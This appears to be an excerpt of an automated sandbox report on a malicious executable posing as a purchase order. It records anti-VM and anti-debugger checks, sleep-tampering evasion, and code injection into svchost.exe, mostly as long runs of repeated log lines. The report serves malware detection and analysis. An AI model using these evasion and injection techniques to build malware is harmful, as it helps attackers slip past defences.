                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion:

                    barindex
                    Found evasive API chain (trying to detect sleep duration tampering with parallel thread)Show sources
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeFunction Chain: systemQueried,systemQueried,threadDelayed,threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,systemQueried,threadDelayed,threadDelayed,threadDelayed,systemQueried,threadDelayed,systemQueried,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed
                    Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\SysWOW64\svchost.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00401980 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,
                    Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\svchost.exe TID: 6660Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\svchost.exe TID: 5992Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\svchost.exe TID: 6916Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\New Order PO20011046.exe TID: 6332Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\New Order PO20011046.exe TID: 6332Thread sleep count: 138 > 30
                    Source: C:\Users\user\Desktop\New Order PO20011046.exe TID: 6332Thread sleep time: -4140000s >= -30000s
                    Source: C:\Users\user\Desktop\New Order PO20011046.exe TID: 6332Thread sleep time: -507620s >= -30000s
                    Source: C:\Users\user\Desktop\New Order PO20011046.exe TID: 6332Thread sleep time: -776334s >= -30000s
                    Source: C:\Users\user\Desktop\New Order PO20011046.exe TID: 6332Thread sleep time: -388583s >= -30000s
                    Source: C:\Users\user\Desktop\New Order PO20011046.exe TID: 6332Thread sleep time: -388778s >= -30000s
                    Source: C:\Users\user\Desktop\New Order PO20011046.exe TID: 6332Thread sleep time: -209349s >= -30000s
                    Source: C:\Users\user\Desktop\New Order PO20011046.exe TID: 6332Thread sleep time: -89670s >= -30000s
                    Source: C:\Users\user\Desktop\New Order PO20011046.exe TID: 6332Thread sleep time: -59688s >= -30000s
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_504851E0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                    Source: New Order PO20011046.exe, 0000000B.00000002.922266457.0000000005310000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                    Source: New Order PO20011046.exe, 0000000B.00000002.922266457.0000000005310000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                    Source: New Order PO20011046.exe, 0000000B.00000002.922266457.0000000005310000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                    Source: New Order PO20011046.exe, 0000000B.00000002.922266457.0000000005310000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_0040CDC9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00401980 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00401980 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_0040AD70 GetProcessHeap,HeapFree,
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_0040CDC9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_0040E5DC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00416F2A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_004123B1 SetUnhandledExceptionFilter,
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion:

                    barindex
                    Allocates memory in foreign processesShow sources
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 50480000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 180000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 190000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1A0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1F0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 440000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 450000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 460000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 470000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 480000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 490000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 4A0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 4B0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 4C0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 4D0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 4E0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: B10000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: B20000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: B30000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: B40000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: B50000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: B60000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: B70000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: B80000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: B90000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: BA0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: BB0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: BC0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: BD0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: BE0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: BF0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: C00000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: C10000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: C20000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: C30000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: C40000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: C50000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: C60000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: C70000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: C80000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: C90000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: CA0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: CB0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: CC0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: CD0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: CE0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: CF0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: D00000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: D10000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: D20000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: D30000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: D40000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: D50000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: D60000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: D70000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: D80000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: D90000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: DA0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: DB0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: DC0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: DD0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: DE0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: DF0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: E00000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: E10000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: E20000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: E30000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: E40000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: E50000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: E60000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: E70000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: E80000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: E90000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: EA0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: EB0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: EC0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: ED0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: EE0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: EF0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: F00000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: F10000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: F20000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: F30000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: F40000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: F50000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: F60000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: F70000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: F80000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: F90000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: FA0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: FB0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: FC0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: FD0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: FE0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: FF0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1000000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1010000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1020000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1030000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1040000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1050000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1060000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1070000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1080000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1090000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 10A0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 10B0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 10C0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 10D0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 10E0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 10F0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1100000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1110000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1120000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1130000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1140000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1150000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1160000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1170000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1180000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1190000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 11A0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 11B0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 11C0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 11D0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 11E0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 11F0000 protect: page execute and read and write
